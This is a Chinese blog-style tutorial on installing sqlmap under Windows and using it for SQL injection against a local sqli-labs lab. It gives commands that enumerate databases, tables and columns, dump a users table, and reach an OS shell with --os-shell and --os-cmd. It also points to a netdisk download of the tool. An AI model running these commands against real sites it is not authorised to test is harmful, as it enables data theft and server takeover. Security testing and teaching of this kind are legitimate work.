SQLMAP安装及使用教程

Posted xiao飞仔

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLMAP安装及使用教程相关的知识,希望对你有一定的参考价值。

自动化SQL注入神器:

SQLMAP,功能时发现并利用指定的URL的SQL注入漏洞。支持的数据库:mysql、Oracle、MSSQLserver、Access、DB2等

百度网盘

链接:https://pan.baidu.com/s/1xfQiWsFu17SEGcb4tB6jjw

提取码: 5yqd

SQLMAP的安装:

    

一、安装python环境

python-3.8.2-amd64

安装中选中:Add python3.8 to path,只有不用手动配置python的环境变量!选择自定义安装

 

点击next,这里可以修改储存路径,我是虚拟机,就扔C盘了

 点击install

 Win+r输入cmd进入命令框,输入python,安装成功

二、安装SQLMAP

  重命名为sqlmap

 三、生成SQLMAP快捷方式

桌面右键创建快捷方式

输入cmd

 名称写为花花(最好写成SQLMAP,以免忘记,你也可以叫别的名字比如草草什么的)

 

 在生成的SQLMAP下右键属性,修改起始位置为你储存sqlmap的起始位置,点击应用,确定

 

进来就是这样的

 四、SQLMAP注入模式:

 1.布尔盲注

 2.时间盲注

 3.报错注入

 4.union联合注入

 5.堆叠注入

SQLMAP的应用:(拿sqlilabs less8举例)

常用选项:

-u:指定url

sqlmap.py -u  http://127.0.0.1:500/Less-8/?id=1 --dbms:指定数据库类型

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --dbms=mysql

--os:指定操作系统

 sqlmap.py -u  http://127.0.0.1:500/Less-8/?id=1 --os=linux

--proxy:指定代理

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --proxy 代理的url

--data:指定POST方式提交的数据

sqlmap.py -u  http://127.0.0.1:500/Less-8  --data=’id’=1

--flush-session :刷新缓存

sqlmap.py -u  http://127.0.0.1:500/Less-8/?id=1 --flush-session

--cookie=COOKIE:指定访问页面的cookies信息

sqlmap.py -u  http://127.0.0.1:500/Less-8/?id=1 --cookie="phpSESSID=a8d127e.."

五、SQLMAP的注入流程:

--dbs:列出所有的数据库名称

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1--dbs (列出所有数据库)

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --current-db (列出当前数据库)

 

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 --current-db --dbms=mysql

-D :指定数据库

-T:指定数据表

-C:指定列名称

--tables:列出指定数据库中的所有表

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security  --tables

 --columns:列出指定库中的[指定表的]所有列

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security -columns

 

 --dump:列出指定库中的表中的数据

sqlmap.py -u http://127.0.0.1:500/Less-8/?id=1 -D security -T users -dump

 

 

Sqlmap安装及使用

Sqlmap

概述

sqlmap 是一个开源的渗透测试工具,可以用来进行自动化检测,利用 SQL 注入漏洞,获取数据库服 务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获 取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
地址https://github.com/sqlmapproject/sqlmap

安装

输入以下指令出现此界面即安装成功

python sqlmap.py -h

简单使用

sqlmap -u http://example.com --dbs 跑出数据库
sqlmap -u http://example.com -D 数据库名 --tables 跑出指定数据库的表
sqlmap -u http://example.com -D 数据库名 -T 表名 --columns 跑出指定表的列名
sqlmap -u http://example.com -D 数据库名 -T 表名 -C 指定列 --dump 跑出指定列中的值

sqlmap 与 burp 组合利用(万能用法)

sqlmap -r xxxx.txt --risk 3 --level 3

https://www.cnblogs.com/tdcqma/p/5610235.html
常用参数
–users 列举数据库管理系统中的用户
–current-db 爆出当前数据库信息
–is-dba 检测当前用户是否是管理员
–os-shell 模拟一个可以执行任意命令的 shell
–os-cmd 执行命令
–current-user 列举当前用户
–technique 指定注入方法 BEUST
risk 1 风险等级
level 1 检测级别
–proxy =http:// 设置代理
–batch 非交互模式
-p 指定 sql 注入点

相关拓展:
Sqlmap用户手册
https://blog.csdn.net/wn314/article/details/78872828

以上是关于SQLMAP安装及使用教程的主要内容,如果未能解决你的问题,请参考以下文章

sqlmap的安装及使用

黑客工具之sqlmap安装教程,超详细使用教程(附工具安装包)

兽哥教你sqlmap,sqlmap的安装及使用

漏洞扫描工具都有哪些

sqlmap Windows 安装教程

安全测试sqlmap安装方法